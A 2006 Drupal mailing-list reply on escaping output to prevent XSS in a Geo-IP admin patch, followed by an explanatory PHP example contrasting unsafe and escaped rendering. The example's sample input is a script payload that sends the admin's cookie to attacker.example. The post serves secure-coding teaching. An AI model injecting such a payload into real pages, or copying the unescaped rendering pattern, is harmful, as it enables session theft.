[development] Geo-IP Modifications to 'watchdog' and 'statistics' modules
Dries Buytaert
dries.buytaert at gmail.com
Tue Apr 18 17:25:43 UTC 2006
>> The screenshots look nice but the code looks a little dangerous as you're not validating the input. Hackers can inject XSS attacks.
>
> I'm not sure who the hackers would be, since this is on the admin side of things, and my script only operates on the hostname that is already in the SQL db.
If the server you 'curl' sends back malicious Javascript, they could
hijack your session and take over your website.
> Yeah. This script, in the admin pages, only acts on whatever data is in the watchdog 'hostname' field, which is an IP address placed there by other parts of Drupal (as you know. ;)
MySQL tables in Drupal contain insecure data, including the watchdog
and statistics tables. Drupal cleans up the data "on output" (just
before sending the data to the client). Your code does not clean up
the data, whereas the original code did.
--
Dries Buytaert :: http://www.buytaert.net/
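The "clean up on output" rule Dries describes, as an added example that is not code from the thread, from the Geo-IP patch under discussion, or from Drupal itself. It assumes a hypothetical admin table that shows the watchdog hostname next to a free-text location string fetched from a remote geo-IP server (the 'curl' in the reply above); both values are treated as untrusted and escaped just before they are sent to the browser, which is what Drupal's check_plain() does around the same htmlspecialchars() call:

```php
<?php
// Added example (not from the thread, the patch, or Drupal core).
// Assumption: $hostname comes from the watchdog table and $location is the
// text a remote geo-IP service returned for it; neither is trusted.

function escape_for_html(string $text): string {
    // Convert a string to plain text "on output": <, >, &, " and ' become
    // entities, so the browser renders them instead of parsing them as markup.
    // Drupal's check_plain() wraps this same call.
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

function render_row_unsafe(string $hostname, string $location): string {
    // The pattern criticised in the thread: database and remote-service
    // values concatenated straight into HTML sent to the admin's browser.
    return '<tr><td>' . $hostname . '</td><td>' . $location . '</td></tr>';
}

function render_row_safe(string $hostname, string $location): string {
    // Same row, with every untrusted value escaped at the point of output.
    return '<tr><td>' . escape_for_html($hostname) . '</td><td>'
         . escape_for_html($location) . '</td></tr>';
}

// Constructed sample input: a hostname as Drupal stores it, and the body a
// hostile or compromised geo-IP server could return for that address.
$hostname = '192.0.2.10';
$location = '<script>document.location="http://attacker.example/?c="'
          . '+document.cookie</script>';

// Unsafe: the browser executes the script inside the admin's session.
echo render_row_unsafe($hostname, $location), "\n";

// Safe: the same string arrives as literal text, <script> shown as &lt;script&gt;.
echo render_row_safe($hostname, $location), "\n";
```

The escaping belongs in the rendering code, not in the script that fetches or stores the data: storing already-escaped text in the table would break every other consumer of the column, which is why Drupal keeps raw values in MySQL and escapes at output time.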